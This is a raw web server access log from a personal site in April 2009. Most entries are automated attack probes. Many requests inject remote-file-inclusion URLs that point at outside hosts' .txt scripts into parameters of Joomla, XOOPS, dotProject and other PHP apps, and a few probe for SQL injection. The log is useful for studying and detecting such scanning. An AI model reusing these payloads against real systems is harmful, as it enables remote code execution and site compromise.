200.93.147.154 - - [28/Apr/2009:10:05:33 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/hoki121/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:10:05:33 -0700] "GET /logs/access_080224.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/hoki121/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:10:05:35 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/hoki121/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:10:05:35 -0700] "GET /logs/access_080406.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/hoki121/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
92.75.152.97 - - [28/Apr/2009:10:05:52 -0700] "GET /xlmnhfaefaaaabmbl.php HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:10:06:18 -0700] "GET /logs/access_080406.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:10:06:19 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:10:06:19 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:10:06:20 -0700] "GET /logs/access_080224.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:10:06:23 -0700] "GET /logs/access_080406.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:10:06:24 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:10:06:24 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:10:06:29 -0700] "GET /logs/access_080224.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.140.23.192 - - [28/Apr/2009:10:07:26 -0700] "GET /logs/access_081201.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.24.136.10 - - [28/Apr/2009:10:08:14 -0700] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://www.mjswimgear.dk/joomla///administrator/modules/id1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
62.140.23.192 - - [28/Apr/2009:10:08:47 -0700] "GET /logs/access_081013.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:10:09:06 -0700] "GET /logs/access_080421.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:09:12 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:09:12 -0700] "GET /logs/access_080807.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:09:12 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:09:12 -0700] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:09:13 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:09:13 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:09:13 -0700] "GET /logs/access_080807.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:09:14 -0700] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:10:09:35 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.bandbib.com/web/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:10:09:35 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.bandbib.com/web/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
85.214.37.11 - - [28/Apr/2009:10:09:46 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.armatuhogar.com.ar//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.37.11 - - [28/Apr/2009:10:09:46 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.armatuhogar.com.ar//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.37.11 - - [28/Apr/2009:10:09:46 -0700] "GET /logs/access_090408.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.armatuhogar.com.ar//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.37.11 - - [28/Apr/2009:10:09:46 -0700] "GET /logs/access_090415.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.armatuhogar.com.ar//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.129.214.105 - - [28/Apr/2009:10:09:47 -0700] "GET /logs/access_080618.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://unixcod.org/modules/mod_donate/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.103.16.43 - - [28/Apr/2009:10:10:03 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.103.16.43 - - [28/Apr/2009:10:10:22 -0700] "GET /logs/access_081123.log//?path%5Bdocroot%5D=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:10:10:27 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.41 - - [28/Apr/2009:10:10:28 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
200.103.16.43 - - [28/Apr/2009:10:10:28 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.wizard.com.br/id.txt?? HTTP/1.1" 200 97193 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:10:31 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:10:31 -0700] "GET /logs/access_081201.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:10:31 -0700] "GET /logs/access_090318.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:10:31 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:10:10:43 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
200.103.16.43 - - [28/Apr/2009:10:11:00 -0700] "GET /?path%5Bdocroot%5D=http://www.wizard.com.br/id.txt?? HTTP/1.1" 500 292 "-" "libwww-perl/5.805" "www.dmulk.com"
99.198.113.90 - - [28/Apr/2009:10:11:13 -0700] "GET /logs/access_071225.log/admin.php?id=' HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
99.198.113.90 - - [28/Apr/2009:10:11:14 -0700] "GET /admin.php?id=' HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
99.198.113.90 - - [28/Apr/2009:10:11:14 -0700] "GET /logs/admin.php?id=' HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
62.140.23.192 - - [28/Apr/2009:10:11:34 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.140.23.192 - - [28/Apr/2009:10:11:34 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.140.23.192 - - [28/Apr/2009:10:11:34 -0700] "GET /logs/access_081119.log//skin/zero_vote/ask_password.php?dir=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.236.53.4 - - [28/Apr/2009:10:11:56 -0700] "GET /logs/access_090415.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [28/Apr/2009:10:11:56 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [28/Apr/2009:10:11:56 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [28/Apr/2009:10:12:04 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [28/Apr/2009:10:12:04 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [28/Apr/2009:10:12:04 -0700] "GET /logs/access_090415.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:10:12:12 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:10:12:12 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:10:12:12 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 200 50 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [28/Apr/2009:10:12:15 -0700] "GET /logs/access_071214.log/?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [28/Apr/2009:10:12:18 -0700] "GET /logs/access_080331.log/?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [28/Apr/2009:10:12:18 -0700] "GET /logs/?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 200 97188 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:10:12:23 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:10:12:38 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:12:51 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:12:51 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:12:51 -0700] "GET /logs/access_081201.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:12:56 -0700] "GET /logs/access_090318.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:10:12:57 -0700] "GET /logs/access_080323.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [28/Apr/2009:10:13:00 -0700] "GET /?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
62.140.23.192 - - [28/Apr/2009:10:13:02 -0700] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:10:13:18 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
99.198.113.90 - - [28/Apr/2009:10:13:23 -0700] "GET /logs/access_090315.log/admin.php?id=' HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
85.214.37.11 - - [28/Apr/2009:10:13:31 -0700] "GET /logs/access_090415.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.armatuhogar.com.ar//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:10:13:32 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
69.197.152.83 - - [28/Apr/2009:10:13:53 -0700] "GET /logs/access_080530.log/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://dark912.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
69.197.152.83 - - [28/Apr/2009:10:13:53 -0700] "GET /logs/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://dark912.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
69.197.152.83 - - [28/Apr/2009:10:13:53 -0700] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://dark912.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
218.38.243.71 - - [28/Apr/2009:10:13:55 -0700] "GET /logs/access_071214.log/?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [28/Apr/2009:10:13:56 -0700] "GET /logs/access_080331.log/?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.103.16.43 - - [28/Apr/2009:10:13:57 -0700] "GET /?path%5Bdocroot%5D=http://www.wizard.com.br/id.txt?? HTTP/1.1" 200 43288 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.243.71 - - [28/Apr/2009:10:14:03 -0700] "GET /logs/?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 200 97188 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:10:14:10 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:10:14:25 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
218.38.243.71 - - [28/Apr/2009:10:14:43 -0700] "GET /logs/access_071214.log/?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [28/Apr/2009:10:14:45 -0700] "GET /logs/access_080331.log/?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [28/Apr/2009:10:14:45 -0700] "GET /logs/?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 200 97188 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [28/Apr/2009:10:14:49 -0700] "GET /?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 200 43297 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:14:52 -0700] "GET /logs/access_080520.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:14:52 -0700] "GET /logs/access_080807.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.213.0.1 - - [28/Apr/2009:10:14:53 -0700] "GET /logs/access_081109.log//dotproject//includes/db_connect.php?baseDir=http://m0nello.altervista.org/conf/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
200.213.0.1 - - [28/Apr/2009:10:14:53 -0700] "GET /dotproject//includes/db_connect.php?baseDir=http://m0nello.altervista.org/conf/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
200.213.0.1 - - [28/Apr/2009:10:14:53 -0700] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://m0nello.altervista.org/conf/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:10:14:56 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:14:57 -0700] "GET /logs/access_080520.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:14:57 -0700] "GET /logs/access_080807.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:10:15:08 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:10:15:08 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:10:15:11 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:10:15:14 -0700] "GET /logs/access_080427.log//modules/xfsection/modify.php?dir_module=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.243.71 - - [28/Apr/2009:10:15:35 -0700] "GET /?_zb_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 200 43302 "-" "Mozilla/5.0" "www.dmulk.com"
78.129.214.105 - - [28/Apr/2009:10:15:58 -0700] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.129.214.105 - - [28/Apr/2009:10:15:58 -0700] "GET /logs/access_080807.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.129.214.105 - - [28/Apr/2009:10:15:58 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.129.214.105 - - [28/Apr/2009:10:15:58 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.213.0.1 - - [28/Apr/2009:10:16:50 -0700] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://m0nello.altervista.org/conf/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
200.213.0.1 - - [28/Apr/2009:10:16:50 -0700] "GET /logs/access_081109.log//dotproject//includes/db_connect.php?baseDir=http://m0nello.altervista.org/conf/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
200.213.0.1 - - [28/Apr/2009:10:16:52 -0700] "GET /dotproject//includes/db_connect.php?baseDir=http://m0nello.altervista.org/conf/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:16:56 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:16:56 -0700] "GET /logs/access_080416.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:16:56 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:17:00 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
